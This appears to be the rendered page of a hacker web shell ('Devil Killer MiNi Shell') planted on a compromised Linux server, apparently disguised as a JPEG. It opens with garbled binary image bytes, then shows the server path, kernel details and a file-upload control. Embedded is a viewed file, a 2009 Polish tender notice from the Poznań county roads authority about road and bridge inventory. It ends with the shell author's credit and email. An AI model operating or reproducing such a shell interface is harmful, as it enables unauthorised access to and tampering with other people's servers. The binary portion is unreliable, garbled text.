JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/128670-N-2009.html

<p class="kh_header"><b>Poznań: Wykonanie systemu referencyjnego, stabilizacja punktów węzłowych, zebranie i zakodowanie             w  oprogramowaniu danych inwentaryzacyjnych dróg i obiektów mostowych - na całej sieci dróg powiatowych powiatu poznańskiego oraz wykonanie oceny stanu nawierzchni jezdni wraz z rejestracją uszkodzeń nawierzchni i pomiarów ugięć jezdni - na wybranych odcinkach dróg powiatowych powiatu poznańskiego (Przetarg nr 5/U/2009)</b><br>
<b>Numer ogłoszenia: 128670 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Poznaniu , ul. Zielona 8, 61-851 Poznań, woj. wielkopolskie, tel. 061 8593430, faks 061 8593429.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpp.bip.net.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie systemu referencyjnego, stabilizacja punktów węzłowych, zebranie i zakodowanie             w  oprogramowaniu danych inwentaryzacyjnych dróg i obiektów mostowych - na całej sieci dróg powiatowych powiatu poznańskiego oraz wykonanie oceny stanu nawierzchni jezdni wraz z rejestracją uszkodzeń nawierzchni i pomiarów ugięć jezdni - na wybranych odcinkach dróg powiatowych powiatu poznańskiego (Przetarg nr 5/U/2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi związane z Wykonaniem systemu referencyjnego, stabilizacją punktów węzłowych, zebraniem i zakodowaniem w oprogramowaniu danych inwentaryzacyjnych dróg i obiektów mostowych - na całej sieci dróg powiatowych powiatu poznańskiego oraz wykonanie oceny stanu nawierzchni jezdni wraz z rejestracją uszkodzeń nawierzchni i pomiarów ugięć jezdni - na wybranych odcinkach dróg powiatowych powiatu poznańskiego. Szczegółowe informacje zostały określone w SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 72.26.80.00-1, 72.32.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. Opis warunków udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art. 22 ust. 1 oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i ust.2 - Prawo zamówień publicznych oraz spełniają wymagania określone w SIWZ.  
W celu potwierdzenia spełnienia powyższych warunków zamawiający żąda złożenia :
I.	 pisemnego oświadczenia na formularzu zgodnym z treścią Załącznika - Oświadczenie , 
II. dokumentów na potwierdzenie spełnienia warunków udziału w postępowaniu art.  22 ust. 1 p. 1, 2, 3, 4 w następującym zakresie:
a) Dla spełnienia warunku zawartego w art. 22 ust.1 p. 1 -  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: posiadają uprawnienia do wykonywania określonej  działalności lub czynności  - zgodnie z  wymaganiami ustawowymi zamawiający żąda złożenia niżej wymienionych dokumentów:      
1.  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności  
     gospodarczej,   wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert,
1.1	pełnomocnictwo dla podmiotów wspólnie ubiegających się o zamówienie.    

   b) Dla spełnienia warunku zawartego w art. 22 ust. 1, p. 2 - O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne  zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - zamawiający żąda przedstawienia niżej wymienionych dokumentów:
    1.  wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o charakterze i złożoności równoważnej z przedmiotem zamówienia tj:
               a) co najmniej 3 zamówienia obejmujące: wykonanie systemu referencyjnego, gromadzenie drogowych danych  ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego, wdrożenie współpracującego z tym systemem oprogramowania przeznaczonego do obsługi baz danych ewidencji danych drogowych, wykonanie sekwencji zdjęć pojedynczych z 4 kamer - dla długości odcinków dróg nie mniejszej niż 300 km dla każdego zamówienia,
               b)  co najmniej 3 zamówienia obejmujące: wprowadzenie do bazy danych oferowanego systemu drogowych danych ewidencyjnych ( w zakresie szczegółowo opisanym w Rozdziale II, ust. III - Zakres usług objętych zamówieniem), dla odcinków sieci drogowej o łącznej długości nie mniejszej niż 300 km,
               c)  co najmniej 3 zamówienia obejmujące ewidencję obiektów mostowych dla obszaru powiatu lub województwa, 
  d) co najmniej 1 zamówienie obejmujące ocenę stanu nawierzchni dróg, zgodnie z metodyką opisaną w przedmiocie zamówienia,
  e) co najmniej 1 zamówienie obejmujące pomiar ugięć nawierzchni dróg, zgodnie z metodyką opisaną w przedmiocie zamówienia,
            z podaniem ich wartości oraz daty i miejsca wykonania  zgodnie z treścią Załącznika - Doświadczenie zawodowe  wraz  z załączonymi dokumentami potwierdzającymi, że usługi te, zostały wykonane należycie.    
2. wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, posiadających wymagane uprawnienia. 
        2.1. W przypadku nie dysponowania osobami określonymi w ust. 3, należy złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób do wykonania zamówienia zgodnie z treścią Załącznika - Zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

 III.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów,   
       o których mowa w ust. II, lit. a,
       1.  pkt  1- składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,  potwierdzające  odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
Dokumenty, o których mowa w ust 1 lit. a, powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert. 

   B. Opis sposobu dokonania oceny spełnienia tych warunków.
   
1.	Warunki udziału w postępowaniu oceniane będą dla wszystkich punktów -  spełnia/nie spełnia,
2.	Zamawiający żąda złożenia dokumentów w oryginale lub kserokopii poświadczonej za zgodność z oryginałem /każda strona/ przez Wykonawcę.
3.	Formularz oferty oraz pozostałe załączniki, dla których zostały określone wzory, muszą być podpisane przez wykonawcę lub pełnomocnika. 
4.	Formularz oferty oraz pozostałe załączniki, dla których zostały określone wzory, należy wypełnić ściśle według niniejszych wymagań, bez dokonywania zmian w treści tych dokumentów. Jeżeli w załącznikach zabraknie miejsca należy załączyć dodatkowe strony.  
5.	Dokumenty nie wymagane niniejszą specyfikacją nie będą przez zamawiającego rozpatrywane.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać prawidłowo wypełnione następujące dokumenty i oświadczenia :
1.     Formularz Oferty ( na załączonym druku) - należy podać cenę netto, określić procentowo wysokość  podatku VAT i podać cenę brutto, z dokładnością do 0,01 zł.
        Obowiązuje zasada zaokrąglania w górę liczby 5 występującej na trzecim miejscu po przecinku np.  4,375 = 4,38 . 
        Cenę należy podać z obowiązującym aktualnie podatkiem VAT.
2.     Pisemne oświadczenie na formularzu zgodnym z treścią Załącznika - Oświadczenie. 
    3.     Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej,  
            wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.
    3.1   Pełnomocnictwo dla podmiotów ( konsorcjum i spółka cywilna)  wspólnie ubiegających się o zamówienie. Podmioty te mają obowiązek ustanowienia pełnomocnika. Pełnomocnik musi mieć upoważnienie do co najmniej reprezentowania w postępowaniu wykonawców ubiegających się wspólnie o zamówienie. Może też mieć upoważnienie do podpisania w ich imieniu umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno jednoznacznie wynikać z umowy lub innej czynności prawnej.
     4.    Wykaz wykonanych w okresie 3 lat usług, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie,   zadań o charakterze i złożoności równoważnej z przedmiotem zamówienia tj:
               a) co najmniej 3 zamówienia obejmujące: wykonanie systemu referencyjnego, gromadzenie drogowych danych  ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego, wdrożenie współpracującego z tym systemem oprogramowania przeznaczonego do obsługi baz danych ewidencji danych drogowych, wykonanie sekwencji zdjęć pojedynczych z 4 kamer - dla długości odcinków dróg nie mniejszej niż 300 km dla każdego zamówienia,
               b)  co najmniej 3 zamówienia obejmujące: wprowadzenie do bazy danych oferowanego systemu drogowych danych ewidencyjnych ( w zakresie szczegółowo opisanym w w Rozdziale II, ust. III Zakres usług objętych zamówieniem), dla odcinków sieci drogowej o łącznej długości nie mniejszej niż 300 km,
               c)  co najmniej 3 zamówienia obejmujące ewidencję obiektów mostowych dla obszaru powiatu lub województwa, 
  d) co najmniej 1 zamówienie obejmujące ocenę stanu nawierzchni dróg, zgodnie z metodyką opisaną w przedmiocie zamówienia,
  e) co najmniej 1 zamówienie obejmujące pomiar ugięć nawierzchni dróg, zgodnie z metodyką opisaną w przedmiocie zamówienia,
        z podaniem ich wartości oraz daty i miejsca wykonania  zgodnie z treścią Załącznika - Doświadczenie zawodowe  wraz  z załączonymi dokumentami potwierdzającymi, że usługi te, zostały wykonane należycie.    
      5.   Wykaz osób kierujących robotami zgodnie z treścią Załącznika - Wykaz osób, należy wykazać odpowiednio wykwalifikowaną osobę spełniającą następujące wymagania:
         - posiadane uprawnienia potwierdzone odpowiednim dokumentem do wykonywania oceny stanu nawierzchni metodą typu BIKD-IBDIM lub równoważną.
   5.1.W przypadku nie dysponowania osobami określonymi w ust. 5, należy złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób do wykonania zamówienia zgodnie z treścią Załącznika - Zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów,                
o których mowa w ust. 3, - składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,
potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości, dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
    Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdpp.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie firmy: 61-851 Poznań, ul. Zielona 8, VI p., pokój 603.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Poznaniu, 61-851 Poznań, ul. Zielona 8, V p., pokój 504- sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com